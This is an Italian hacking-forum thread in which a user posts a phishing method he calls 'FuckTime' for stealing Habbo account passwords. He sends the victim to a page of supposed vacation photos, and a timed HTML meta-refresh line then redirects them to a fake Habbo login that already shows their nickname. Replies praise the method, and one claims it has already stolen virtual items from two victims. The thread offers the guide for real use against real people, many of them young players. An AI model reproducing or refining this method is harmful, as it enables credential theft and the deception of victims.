Release *-FuckTime-*

Daniel001

Utente Assiduo
Autore del topic
17 Giugno 2008
798
21
Miglior risposta
0
*FuckTime*

Bene,voglio postarvi il fuck più bello in assoluto,può sembrare sciocco ma in buone mani diventa una bomba!!!

FuckTime: Ho inserito un Timer in PHP che automaticamente passa da una pagina all'altra senza autorizzazione del visitatore o in questo caso della vittima

Voi naturalmente con tanto di Social, dovrete riuscire solo a fare andare la vittima sul vostro link.. ci sono vari modi:

  • Via email
  • In Habbo
  • Link su msn

Oppure potete segure la mia GUIDA

Mettiamo caso, che siete andati in gita con la vostra famiglia/scuola o che siete andati in vacanza al mare/montagna..Voi sicuramente un ricordino di una foto la fate no?? bene facciamo caso che volete far vedere una vostra "foto" a un vostro amico/vittima e mandiamo la vittima al sito dove vi presenterà il FuckTime

Quando il vostro amico/vittima si collega vedrà una foto, con una freccia che indica la prossima foto, il vostro amico vorrà scorrere le foto e cliccerà la succesiva, ma alla seconda Index(PAGINA) il tasto avanti non fungerà piu, e con una piccola stringa che ho inserito nel FuckTime La pagina andrà avanti solo dopo un certo periodo prestabilito da voi ecco la stringa.. il numero in rosso sono i secondi

<META NAME="GENERATOR" Content="AlterVista - Editor HTML"><meta http-equiv="refresh" content="10; url=http://TUOSITO.altervista.org/PAGINASUCCESSIVA.html">

Dopo di che il vostro amico vi dirà, hey ma non va avanti.. voi direte forse si e bloccato... Ma quando meno se l'aspetta la pagina dopo 10 secondi o quando volete mettere voi, passerà al Fuck

Ho preparato un FuckTime per voi, ma e una bozza una cosa veloce, sono sicuro che voi potete fare di più ;) buon divertimento

My Life is Daniel001

Il mio FuckTime che ho preparato per voi, e un Fuck personalizzato, infatti mi scelgo prima la vittima, metto il nick della vittima cosi che quando entra, mette solo la password, ecco un'immagine dove non serve che io spieghi... Ha dimenticavo, voi potete mettere qualsiasi fuck a vostro piacimento :emoji_slight_smile:

aadwup.jpg

GUIDA - Daniel001
FONTE - Daniel001
IDEATO - Daniel001


Perfavore, Entra oppure Registrati per vedere i Link!

Perfavore, Entra oppure Registrati per vedere i Link!

PSS: Per una Home convincete seguite il Fuck di MR.SCONTRINO
!"CLICCA QUI"!
 
Ultima modifica:
nn ho capito una cosa che c'entra la foto di una gita co habbo spiegami un po' meglio
 
Facile, fa parte del social :P tu gli dici che hai fatto una gita e che gli vuoi far vedere le foto :emoji_relieved: e lui mentre guarda le foto si ritrova dopo certo periodo da te scelto davanti a un fuck, che lui non si renderà conto :emoji_smiley:
 
Ultima modifica:
In poche parole non è come un fake dove inserisce nick e password ma in questo caso solo la password? giusto?
 
In poche parole non è come un fake dove inserisce nick e password ma in questo caso solo la password? giusto?

ma e cosi difficile capire? e un semplice fuck, dove xo la vittima non vede come prima pagina una home con scritto HABBO CREDITI ma inizialmente vedrà delle foto, che non c'entrano con habbo... ma dopo alcuni secondi scelti da voi, la vittima si ritrova al login !!!!! ok?? vi faccio un disegnino? :emoji_relieved:
 
Non penso che ci cascheranno appena vedranno quella pagina in stile "Habbo". Però è un'ottima Release. Bravo Daniel :emoji_slight_smile:
 
Non penso che ci cascheranno appena vedranno quella pagina in stile "Habbo". Però è un'ottima Release. Bravo Daniel :emoji_slight_smile:

Ma si e solo una bozza il fuck, scommetto che con un buon fuck dopo i secondi ci cascheranno anche i meno n00b ;)
 
Si infatti. Però almeno io non la sò fare quindi.. . Sono fregato anche perchè è un ottimo metodo.
 
Bel metodo ma nn credo ci caschi la gente se prima gli dici gaurda al foto e poi gli appare la schermata habbo no? cmq bella relase :emoji_relieved:
 
Bel metodo ma nn credo ci caschi la gente se prima gli dici gaurda al foto e poi gli appare la schermata habbo no? cmq bella relase :emoji_relieved:

Ma la schermata di habbo gli appare quando vuoi tu, anche se chiude la pagina essi si riapre OK???
 
Idea veramente bella!

Però non credo ci caschi qualcuno... fai prima a mandargli un grabber.
 
Ma non tutti sono professori e dottori al pc :P quindi queste guide sono per i meno abili che vogliono abboccare qualche pesce un po piu grosso, ma devono essere almeno bravi a parlare :emoji_relieved:
 
:emoji_relieved: REA, un fake login, viene usato da i meno esperti... quindi questa guida non deve essere presa in considerazione come la guida dell'anno :P
 
Esattamente..
Però ogni release viene fatta con impegno quindi la apprezzo questa guida ^^
 
Daniel hai fatto una bella realase ma nn credo ci caschino in molti cmq :bravo:
 
ma se siete bravi ci cascano, non dovete far vedere per forza le foto di una famglia, ma digli guarda io e i miei amici che abbiamo fatto su habbo blha blha blha e lo mandi sul fuck
cmq bravo gia ci hanno cascato due di loro con 20/25 furni e 35 crediti